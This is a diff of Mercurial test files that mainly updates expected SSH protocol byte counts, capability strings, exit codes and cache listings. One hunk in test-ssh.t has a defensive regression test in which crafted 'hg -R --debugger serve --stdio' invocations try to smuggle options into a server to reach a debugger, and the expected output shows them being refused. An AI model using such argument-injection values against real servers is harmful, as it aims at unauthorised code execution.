@@ -365,8 +372,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -390,7 +397,7 @@
remote: 0
remote: 0
remote: 0
- remote: 463
+ remote: 444
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
remote: 1
devel-peer-request: protocaps
@@ -447,8 +454,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -494,8 +501,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -539,8 +546,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -609,8 +616,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
Incomplete dictionary send
@@ -691,8 +698,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -725,8 +732,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -768,8 +775,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -797,8 +804,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(105) -> 105:
i> between\n
@@ -838,8 +845,8 @@
i> pairs 81\n
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -887,8 +894,8 @@
o> readline() -> 41:
o> 68986213bd4485ea51533535e3fc9e78007a711f\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -914,7 +921,7 @@
o> readline() -> 41:
o> 68986213bd4485ea51533535e3fc9e78007a711f\n
o> readline() -> 4:
- o> 463\n
+ o> 444\n
Send an upgrade request to a server that doesn't support that command
@@ -943,8 +950,8 @@
i> pairs 81\n
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -962,7 +969,7 @@
sending hello command
sending between command
remote: 0
- remote: 463
+ remote: 444
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
remote: 1
devel-peer-request: protocaps
@@ -1005,8 +1012,8 @@
o> readline() -> 44:
o> upgraded this-is-some-token exp-ssh-v2-0003\n
o> readline() -> 4:
- o> 462\n
- o> readline() -> 463:
+ o> 443\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
$ cd ..
@@ -1081,7 +1088,6 @@
remote-changegroup
http
https
- rev-branch-cache
stream
v2
@@ -1114,14 +1120,14 @@
o> readline() -> 44:
o> upgraded this-is-some-token exp-ssh-v2-0003\n
o> readline() -> 4:
- o> 462\n
- o> readline() -> 463:
+ o> 443\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 447\n
- o> readline() -> 447:
+ o> 428\n
+ o> readline() -> 428:
o> capabilities: branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
Multiple upgrades is not allowed
@@ -1152,8 +1158,8 @@
o> readline() -> 44:
o> upgraded this-is-some-token exp-ssh-v2-0003\n
o> readline() -> 4:
- o> 462\n
- o> readline() -> 463:
+ o> 443\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(45) -> 45:
i> upgrade another-token proto=irrelevant\n
@@ -1224,8 +1230,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -1343,8 +1349,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1381,8 +1387,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1431,8 +1437,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1461,8 +1467,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1492,8 +1498,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1525,8 +1531,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1559,8 +1565,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1595,8 +1601,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1634,8 +1640,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1674,8 +1680,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending pushkey command
@@ -1726,8 +1732,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1759,8 +1765,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1809,8 +1815,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1847,8 +1853,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1886,8 +1892,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1922,8 +1928,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1959,8 +1965,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1992,8 +1998,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -2030,8 +2036,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -2071,8 +2077,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending pushkey command
@@ -2137,8 +2143,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -2177,8 +2183,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending batch with 3 sub-commands
--- a/tests/test-ssh.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-ssh.t Tue Apr 20 11:01:06 2021 -0400
@@ -64,8 +64,10 @@
$ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream
streaming all changes
- 8 files to transfer, 827 bytes of data
- transferred 827 bytes in * seconds (*) (glob)
+ 8 files to transfer, 827 bytes of data (no-zstd !)
+ transferred 827 bytes in * seconds (*) (glob) (no-zstd !)
+ 8 files to transfer, 846 bytes of data (zstd !)
+ transferred * bytes in * seconds (* */sec) (glob) (zstd !)
updating to branch default
2 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ cd local-stream
@@ -390,6 +392,7 @@
abort: destination 'a repo' is not empty
[10]
+#if no-rhg
Make sure hg is really paranoid in serve --stdio mode. It used to be
possible to get a debugger REPL by specifying a repo named --debugger.
$ hg -R --debugger serve --stdio
@@ -402,6 +405,27 @@
$ hg -R narf serv --stdio
abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio']
[255]
+#else
+rhg aborts early on -R without a repository at that path
+ $ hg -R --debugger serve --stdio
+ abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio'] (missing-correct-output !)
+ abort: repository --debugger not found (known-bad-output !)
+ [255]
+ $ hg -R --config=ui.debugger=yes serve --stdio
+ abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio'] (missing-correct-output !)
+ abort: repository --config=ui.debugger=yes not found (known-bad-output !)
+ [255]
+ $ hg -R narf serv --stdio
+ abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] (missing-correct-output !)
+ abort: repository narf not found (known-bad-output !)
+ [255]
+If the repo does exist, rhg finds an unsupported command and falls back to Python
+which still does the right thing
+ $ hg init narf
+ $ hg -R narf serv --stdio
+ abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio']
+ [255]
+#endif
Test hg-ssh using a helper script that will restore PYTHONPATH (which might
have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right
@@ -463,7 +487,7 @@
remote: Permission denied
remote: pretxnopen.hg-ssh hook failed
abort: push failed on remote
- [255]
+ [100]
$ cd $TESTTMP
@@ -518,9 +542,11 @@
devel-peer-request: pairs: 81 bytes
sending hello command
sending between command
- remote: 463 (sshv1 !)
+ remote: 444 (sshv1 no-rust !)
+ remote: 463 (sshv1 rust !)
protocol upgraded to exp-ssh-v2-0003 (sshv2 !)
- remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !)
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !)
remote: 1 (sshv1 !)
devel-peer-request: protocaps
devel-peer-request: caps: * bytes (glob)
@@ -537,7 +563,7 @@
no changes found
devel-peer-request: getbundle
devel-peer-request: bookmarks: 1 bytes
- devel-peer-request: bundlecaps: 289 bytes
+ devel-peer-request: bundlecaps: 270 bytes
devel-peer-request: cg: 1 bytes
devel-peer-request: common: 122 bytes
devel-peer-request: heads: 122 bytes
@@ -655,7 +681,7 @@
remote: rollback completed
remote: pretxnchangegroup.fail hook failed
abort: push failed on remote
- [255]
+ [100]
abort during pull is properly reported as such
@@ -670,7 +696,7 @@
searching for changes
remote: abort: this is an exercise
abort: pull failed on remote
- [255]
+ [100]
abort with no error hint when there is a ssh problem when pulling
--- a/tests/test-static-http.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-static-http.t Tue Apr 20 11:01:06 2021 -0400
@@ -231,8 +231,6 @@
/.hg/bookmarks
/.hg/bookmarks.current
/.hg/cache/hgtagsfnodes1
- /.hg/cache/rbc-names-v1
- /.hg/cache/rbc-revs-v1
/.hg/dirstate
/.hg/requires
/.hg/store/00changelog.i
@@ -248,8 +246,6 @@
/remote-with-names/.hg/bookmarks.current
/remote-with-names/.hg/cache/branch2-served
/remote-with-names/.hg/cache/hgtagsfnodes1
- /remote-with-names/.hg/cache/rbc-names-v1
- /remote-with-names/.hg/cache/rbc-revs-v1
/remote-with-names/.hg/cache/tags2-served
/remote-with-names/.hg/dirstate
/remote-with-names/.hg/localtags
@@ -266,7 +262,6 @@
/remote/.hg/cache/branch2-served
/remote/.hg/cache/hgtagsfnodes1
/remote/.hg/cache/rbc-names-v1
- /remote/.hg/cache/rbc-revs-v1
/remote/.hg/cache/tags2-served
/remote/.hg/dirstate
/remote/.hg/localtags
@@ -288,8 +283,6 @@
/sub/.hg/bookmarks
/sub/.hg/bookmarks.current
/sub/.hg/cache/hgtagsfnodes1
- /sub/.hg/cache/rbc-names-v1
- /sub/.hg/cache/rbc-revs-v1
/sub/.hg/dirstate
/sub/.hg/requires
/sub/.hg/store/00changelog.i
--- a/tests/test-stream-bundle-v2.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-stream-bundle-v2.t Tue Apr 20 11:01:06 2021 -0400
@@ -46,9 +46,13 @@
$ hg bundle -a --type="none-v2;stream=v2" bundle.hg
$ hg debugbundle bundle.hg
Stream params: {}
- stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True)
+ stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (no-zstd !)
+ stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (zstd no-rust !)
+ stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (rust !)
$ hg debugbundle --spec bundle.hg
- none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore
+ none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore (no-zstd !)
+ none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (zstd no-rust !)
+ none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (rust !)
Test that we can apply the bundle as a stream clone bundle
--- a/tests/test-strip.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-strip.t Tue Apr 20 11:01:06 2021 -0400
@@ -427,7 +427,7 @@
strip failed, unrecovered changes stored in '$TESTTMP/test/.hg/strip-backup/*-temp.hg' (glob)
(fix the problem, then recover the changesets with "hg unbundle '$TESTTMP/test/.hg/strip-backup/*-temp.hg'") (glob)
abort: pretxnchangegroup.bad hook exited with status 1
- [255]
+ [40]
$ restore
$ hg log -G
o changeset: 4:443431ffac4f
--- a/tests/test-tag.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-tag.t Tue Apr 20 11:01:06 2021 -0400
@@ -290,7 +290,7 @@
$ rm -f .hg/last-message.txt
$ HGEDITOR="\"sh\" \"`pwd`/editor.sh\"" hg tag custom-tag -e
abort: pretag.test-saving-lastmessage hook exited with status 1
- [255]
+ [40]
$ test -f .hg/last-message.txt
[1]
@@ -325,7 +325,7 @@
note: commit message saved in .hg/last-message.txt
